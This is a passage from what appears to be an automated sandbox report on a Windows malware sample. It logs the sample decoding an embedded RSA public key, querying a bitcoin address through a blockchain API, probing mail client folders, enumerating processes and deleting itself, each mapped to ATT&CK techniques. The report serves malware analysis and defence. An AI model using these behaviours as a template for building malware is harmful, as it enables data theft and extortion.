called \"CryptStringToBinaryA\" with parameters {\"pszString\": \"TkQgUFVCTElDIEtFWS0tLS0tCg==\"\n \"cchString\": \"28\"\n \"dwFlags\": \"1\"\n \"pcbBinary\": \"13000000\"}\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CryptStringToBinaryA\" with parameters {\"pszString\": \"LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlJQklqQU5CZ2txaGtpRzl3MEJB\"\n \"cchString\": \"64\"\n \"dwFlags\": \"1\"\n \"pbBinary\": \"-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BA\"\n \"pcbBinary\": \"30000000\"}\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CryptStringToBinaryA\" with parameters {\"pszString\": \"UUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUF2a3R5NXFocUV5ZFI5MDc2RmV2cAowdU1Q\"\n \"cchString\": \"64\"\n \"dwFlags\": \"1\"\n \"pbBinary\": \"QEFAAOCAQ8AMIIBCgKCAQEAvkty5qhqEydR9076Fevp0uMP\"\n \"pcbBinary\": \"30000000\"}\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CryptStringToBinaryA\" with parameters {\"pszString\": \"N0laTm1zMUFBN0dQUVVUaE1XYllpRVlJaEJLY1QwL253WXJCcTBPZ3Y3OUsxdHRh\"\n \"cchString\": \"64\"\n \"dwFlags\": \"1\"\n \"pbBinary\": \"7IZNms1AA7GPQUThMWbYiEYIhBKcT0/nwYrBq0Ogv79K1tta\"\n \"pcbBinary\": \"30000000\"}\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CryptStringToBinaryA\" with parameters {\"pszString\": \"MDRFSFRyWGdjQXAvCk9KZ0JoejlONThhZXdkNHlaQm0yY29lYURHdmNHUkFjOWU3\"\n \"cchString\": \"64\"\n \"dwFlags\": \"1\"\n \"pbBinary\": \"04EHTrXgcAp/OJgBhz9N58aewd4yZBm2coeaDGvcGRAc9e7\"\n \"pcbBinary\": \"30000000\"}\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CryptStringToBinaryA\" with parameters {\"pszString\": \"Mk9iRlEvVE1FL0lvN0xaNXFYRFd6RGFmSThMQTgKSlFtU3owTCsvRytMUFRXZzdr\"\n \"cchString\": \"64\"\n \"dwFlags\": \"1\"\n \"pbBinary\": \"2ObFQ/TME/Io7LZ5qXDWzDafI8LA8JQmSz0L+/G+LPTWg7k\"\n \"pcbBinary\": \"30000000\"}\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CryptStringToBinaryA\" with parameters {\"pszString\": \"UE9wSlQ3V1NrUmI5VDh3NVFnWlJKdXZ2aEVySE04M2tPM0VMVEgrU29FSTUzcAo0\"\n \"cchString\": \"64\"\n \"dwFlags\": \"1\"\n \"pbBinary\": \"POpJT7WSkRb9T8w5QgZRJuvvhErHM83kO3ELTH+SoEI53p4\"\n \"pcbBinary\": \"30000000\"}\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CryptStringToBinaryA\" with parameters {\"pszString\": \"RU5Wd2ZOTkVwT3BucE9PU0tRb2J0SXc1NkNzUUZyaGFjMHNRbE9qZWsvbXVWbHV4\"\n \"cchString\": \"64\"\n \"dwFlags\": \"1\"\n \"pbBinary\": \"ENVwfNNEpOpnpOOSKQobtIw56CsQFrhac0sQlOjek/muVlux\"\n \"pcbBinary\": \"30000000\"}\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CryptStringToBinaryA\" with parameters {\"pszString\": \"amlFbWMwZnN6azJXTFNuCnFyeWlNeXphSTVEV0JEallLWEExdHAyaC95Z2JrWWRG\"\n \"cchString\": \"64\"\n \"dwFlags\": \"1\"\n \"pbBinary\": \"jiEmc0fszk2WLSnqryiMyzaI5DWBDjYKXA1tp2h/ygbkYdF\"\n \"pcbBinary\": \"30000000\"}\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CryptStringToBinaryA\" with parameters {\"pszString\": \"WVJiQUVxd3RMeFQyd01mV1BRSTVPa2hUYTl0WnFEMEgKblFJREFRQUIKLS0tLS1F\"\n \"cchString\": \"64\"\n \"dwFlags\": \"1\"\n \"pbBinary\": \"YRbAEqwtLxT2wMfWPQI5OkhTa9tZqD0HnQIDAQAB-----E\"\n \"pcbBinary\": \"30000000\"}\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CryptStringToBinaryA\" with parameters {\"pszString\": \"TkQgUFVCTElDIEtFWS0tLS0tCg==\"\n \"cchString\": \"28\"\n \"dwFlags\": \"1\"\n \"pbBinary\": \"ND PUBLIC KEY-----\"\n \"pcbBinary\": \"13000000\"}\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CryptStringToBinaryA\" with parameters {\"pszString\": \"MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvkty5qhqEydR9076Fevp\"\n \"cchString\": \"64\"\n \"dwFlags\": \"1\"\n \"pcbBinary\": \"30000000\"}\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CryptStringToBinaryA\" with parameters {\"pszString\": \"0uMP7IZNms1AA7GPQUThMWbYiEYIhBKcT0/nwYrBq0Ogv79K1tta04EHTrXgcAp/\"\n \"cchString\": \"64\"\n \"dwFlags\": \"1\"\n \"pcbBinary\": \"30000000\"}\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CryptStringToBinaryA\" with parameters {\"pszString\": \"OJgBhz9N58aewd4yZBm2coeaDGvcGRAc9e72ObFQ/TME/Io7LZ5qXDWzDafI8LA8\"\n \"cchString\": \"64\"\n \"dwFlags\": \"1\"\n \"pcbBinary\": \"30000000\"}\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CryptStringToBinaryA\" with parameters {\"pszString\": \"JQmSz0L+/G+LPTWg7kPOpJT7WSkRb9T8w5QgZRJuvvhErHM83kO3ELTH+SoEI53p\"\n \"cchString\": \"64\"\n \"dwFlags\": \"1\"\n \"pcbBinary\": \"30000000\"}\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CryptStringToBinaryA\" with parameters {\"pszString\": \"4ENVwfNNEpOpnpOOSKQobtIw56CsQFrhac0sQlOjek/muVluxjiEmc0fszk2WLSn\"\n \"cchString\": \"64\"\n \"dwFlags\": \"1\"\n \"pcbBinary\": \"30000000\"}", "origin": "API Call", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "network-60", "type": 7, "relevance": 1, "name": "HTTP requests contain Base64 strings", "description": "Contains base64 string in header \"Encoding\" in header \"GET /v1/btc/main/addrs/17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt?_=1738935597294 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: api.blockcypher.comConnection: Keep-Alive\"\n Contains base64 string in header \"gzip\" in header \"GET /v1/btc/main/addrs/17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt?_=1738935597294 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: api.blockcypher.comConnection: Keep-Alive\"\n Contains base64 string in header \"MSIE\" in header \"GET /v1/btc/main/addrs/17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt?_=1738935597294 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: api.blockcypher.comConnection: Keep-Alive\"\n Contains base64 string in header \"NET4\" in header \"GET /v1/btc/main/addrs/17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt?_=1738935597294 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: api.blockcypher.comConnection: Keep-Alive\"\n Contains base64 string in header \"InfoPath\" in header \"GET /v1/btc/main/addrs/17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt?_=1738935597294 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: api.blockcypher.comConnection: Keep-Alive\"\n Contains base64 string in header \"Host\" in header \"GET /v1/btc/main/addrs/17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt?_=1738935597294 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: api.blockcypher.comConnection: Keep-Alive\"\n Contains base64 string in header \"Keep\" in header \"GET /v1/btc/main/addrs/17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt?_=1738935597294 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: api.blockcypher.comConnection: Keep-Alive\"\n Contains base64 string in header \"Keep\" in header \"GET /r/gsr1.crl HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Microsoft-CryptoAPI/6.1Host: c.pki.goog\"\n Contains base64 string in header \"User\" in header \"GET /r/gsr1.crl HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Microsoft-CryptoAPI/6.1Host: c.pki.goog\"\n Contains base64 string in header \"goog\" in header \"GET /r/gsr1.crl HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Microsoft-CryptoAPI/6.1Host: c.pki.goog\"\n Contains base64 string in header \"Keep\" in header \"GET /r/r4.crl HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Microsoft-CryptoAPI/6.1Host: c.pki.goog\"\n Contains base64 string in header \"User\" in header \"GET /r/r4.crl HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Microsoft-CryptoAPI/6.1Host: c.pki.goog\"\n Contains base64 string in header \"goog\" in header \"GET /r/r4.crl HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Microsoft-CryptoAPI/6.1Host: c.pki.goog\"", "origin": "Network Traffic", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "binary-71", "type": 8, "relevance": 1, "name": "Sample file has high entropy (likely encrypted/compressed content)", "description": "Sample file \"sample.bin\" has high entropy 7.381583585868172", "origin": "Binary File", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" opened \"\\Device\\KsecDD\"\n \"mshta.exe\" opened \"\\Device\\KsecDD\"\n \"taskkill.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-111", "type": 6, "relevance": 3, "name": "Calls an API typically used to enable or disable privileges in the specified access token", "description": "\"taskkill.exe\" called an API \"AdjustTokenPrivileges\"on file: \\RPC Control\\OLEE83FB7481F1A4AC0B03A5D651686\" (UID: 00000000-00002988)", "origin": "API Call", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-28", "type": 6, "relevance": 3, "name": "Adjusts debug privileges", "description": "\"taskkill.exe\" adjusted SE_DEBUG_PRIVILEGE on file \"\\RPC Control\\OLEE83FB7481F1A4AC0B03A5D651686\"", "origin": "API Call", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\CRYPT32\"; Key: \"DEBUGHEAPFLAGS\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LANMANWORKSTATION\\PARAMETERS\"; Key: \"RPCCACHETIMEOUT\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"cmd.exe\" marked \"C:\\6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" reads file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\desktop.ini\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" reads file \"C:\\Users\\%OSUSER%\\Downloads\\desktop.ini\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" reads file \"C:\\Users\\Public\\desktop.ini\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" reads file \"C:\\Users\\Public\\Desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "network-5", "type": 7, "relevance": 7, "name": "Sends UDP traffic", "description": "\"UDP connection to <IPv4>\"\n \"UDP connection to <IPv4>\"\n \"UDP connection to <IPv4>\"\n \"UDP connection to <IPv4>\"\n \"UDP connection to <IPv4>\"\n \"UDP connection to <IPv4>\"\n \"UDP connection to <IPv4>\"\n \"UDP connection to <IPv4>\"\n \"UDP connection to <IPv4>\"\n \"UDP connection to <IPv4>\"\n \"UDP connection to <IPv4>\"\n \"UDP connection to <IPv4>\"\n \"UDP connection to <IPv4>\"\n \"UDP connection to <IPv4>\"\n \"UDP connection to <IPv4>\"\n \"UDP connection to <IPv4>\"\n \"UDP connection to <IPv4>\"\n \"UDP connection to <IPv4>\"\n \"UDP connection to <IPv4>\"\n \"UDP connection to <IPv4>\"\n \"UDP connection to <IPv4>\"\n \"UDP connection to <IPv4>\"\n \"UDP connection to <IPv4>\"\n \"UDP connection to <IPv4>\"\n \"UDP connection to <IPv4>\"", "origin": "Network Traffic", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189\" has section name .rdata with entropy \"7.21292150495\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189\" has section name .rsrc with entropy \"7.7506416271\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-131", "type": 6, "relevance": 5, "name": "Tries to access mail clients information (file access)", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to open a file \"c:\\programdata\\microsoft\\outlook\\\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to open a file \"c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\microsoft\\outlook\\\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to open a file \"c:\\windows\\serviceprofiles\\localservice\\appdata\\roaming\\microsoft\\outlook\\\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to open a file \"c:\\windows\\serviceprofiles\\networkservice\\appdata\\roaming\\microsoft\\outlook\\\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to open a file \"c:\\windows\\system32\\config\\systemprofile\\appdata\\local\\microsoft\\outlook\\\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to open a file \"c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\microsoft\\outlook\\\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to open a file \"c:\\windows\\serviceprofiles\\networkservice\\appdata\\local\\microsoft\\outlook\\\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to open a file \"c:\\program files\\outlook\\\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to open a file \"c:\\programdata\\outlook\\\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to open a file \"c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\outlook\\\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to open a file \"c:\\windows\\serviceprofiles\\localservice\\appdata\\roaming\\outlook\\\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to open a file \"c:\\windows\\serviceprofiles\\networkservice\\appdata\\roaming\\outlook\\\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to open a file \"c:\\users\\%OSUSER%\\appdata\\roaming\\outlook\\\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to open a file \"c:\\windows\\system32\\config\\systemprofile\\appdata\\local\\outlook\\\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to open a file \"c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\outlook\\\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to open a file \"c:\\windows\\serviceprofiles\\networkservice\\appdata\\local\\outlook\\\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to open a file \"c:\\users\\%OSUSER%\\appdata\\local\\outlook\\\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to open a file \"c:\\program files\\the bat!\\\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to open a file \"c:\\programdata\\the bat!\\\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to open a file \"c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\the bat!\\\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to open a file \"c:\\windows\\serviceprofiles\\localservice\\appdata\\roaming\\the bat!\\\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to open a file \"c:\\windows\\serviceprofiles\\networkservice\\appdata\\roaming\\the bat!\\\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to open a file \"c:\\users\\%OSUSER%\\appdata\\roaming\\the bat!\\\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to open a file \"c:\\windows\\system32\\config\\systemprofile\\appdata\\local\\the bat!\\\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to open a file \"c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\the bat!\\\"", "origin": "API Call", "attck_id": "T1114", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-104", "type": 6, "relevance": 5, "name": "Calls an API typically used to enumerate process encountered in a system snapshot", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"Process32FirstW with parameter [System Process]\" (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"Process32NextW with parameter System\" (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"Process32NextW with parameter smss.exe\" (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"Process32NextW with parameter csrss.exe\" (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"Process32NextW with parameter wininit.exe\" (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"Process32NextW with parameter winlogon.exe\" (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"Process32NextW with parameter services.exe\" (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"Process32NextW with parameter lsass.exe\" (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"Process32NextW with parameter lsm.exe\" (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"Process32NextW with parameter svchost.exe\" (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"Process32NextW with parameter spoolsv.exe\" (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"Process32NextW with parameter taskhost.exe\" (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"Process32NextW with parameter dwm.exe\" (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"Process32NextW with parameter explorer.exe\" (UID: 